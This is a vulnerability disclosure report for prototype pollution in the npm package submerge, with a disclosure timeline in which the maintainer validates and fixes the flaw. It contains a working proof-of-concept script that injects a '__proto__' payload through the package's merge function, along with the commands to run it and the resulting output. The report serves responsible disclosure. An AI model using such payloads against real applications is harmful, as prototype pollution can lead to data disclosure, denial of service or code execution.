Prototype pollution in konfirm/node-submerge

Valid

Reported on

Aug 21st 2022


Description

submerge is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Sensitive Information Disclosure/Denial of Service(DoS)/Remote Code Execution.

Proof of Concept

Create the following PoC file:

// poc.js
var merge = require("submerge")
let obj = {}
let payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}')
console.log("Before : " + {}.polluted);
merge(obj, payload);
console.log("After : " + {}.polluted);

Execute the following commands in another terminal:

npm i submerge  # Install affected module
node poc.js # Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

Impact

May result in Sensitive Information Disclosure/Denial of Service(DoS)/Remote Code Execution.

We are processing your report and will contact the konfirm/node-submerge team within 24 hours. a month ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the konfirm/node-submerge team and are waiting to hear back a month ago
konfirm/node-submerge maintainer gave praise a month ago
Thank you for bringing this issue to my attention. I have used the proof of concept code as the basis for a test scenario, was able to reproduce your finding and then resolve the issue.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
konfirm/node-submerge maintainer validated this vulnerability a month ago
waelahmed-dev has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
konfirm/node-submerge maintainer confirmed that a fix has been merged on c2d67f a month ago
The fix bounty has been dropped
waelahmed-dev
a month ago

Researcher


I'm glad that I could help in making your repo more secure Isn't there any bounty for this report? or at least a CVE? of course if it's possible for you, I would be really grateful

to join this conversation